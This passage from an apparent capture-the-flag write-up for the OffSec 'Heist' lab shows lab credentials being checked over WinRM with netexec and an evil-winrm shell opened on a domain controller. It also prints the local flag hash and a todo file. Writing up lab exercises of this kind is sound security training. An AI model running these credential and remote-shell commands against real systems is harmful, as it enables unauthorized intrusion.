On the web app in 8080 HTTP(S), we get a 200 response code on http://192.168.247.165:5985/wsman, confirming the WinRM is accessible internally, but we’ll need credentials to do anything.
:47001 is the same thing but only open on the target’s localhost. https://morgansimonsen.com/2009/12/10/winrm-and-tcp-ports/
With enox:california credentials
netexec winrm DC01.heist.offsec -u enox -p california
WINRM 192.168.109.165 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:heist.offsec)
WINRM 192.168.109.165 5985 DC01 [+] heist.offsec\enox:california (Pwn3d!)
Pwn3d! indicates we have remote access via winrm. We’ll continue using evil-winrm:
Exploitation with evil-winrm
evil-winrm -i DC01.heist.offsec -u enox -p california
Just like that, we have a shell! I’m actually going to exit, make a directory named scripts
, a copy SauronEye into it, to easily transfer to the host.
This utility will allow us to find .txt files very quickly, including the local flag.
type C:\Users\enox\Desktop\local.txt
9de76564847d8624b14b7595604ba7fd
C:\Users\enox\Desktop\todo.txt
also looks interesting:
- Setup Flask Application for Secure Browser [DONE]
- Use group managed service account for apache [DONE]
- Migrate to apache
- Debug Flask Application [DONE]
- Remove Flask Application
- Submit IT Expenses file to admin. [DONE]
Next I’ll begin enumeration for privilege escalation in [[Enox → svc_apache]].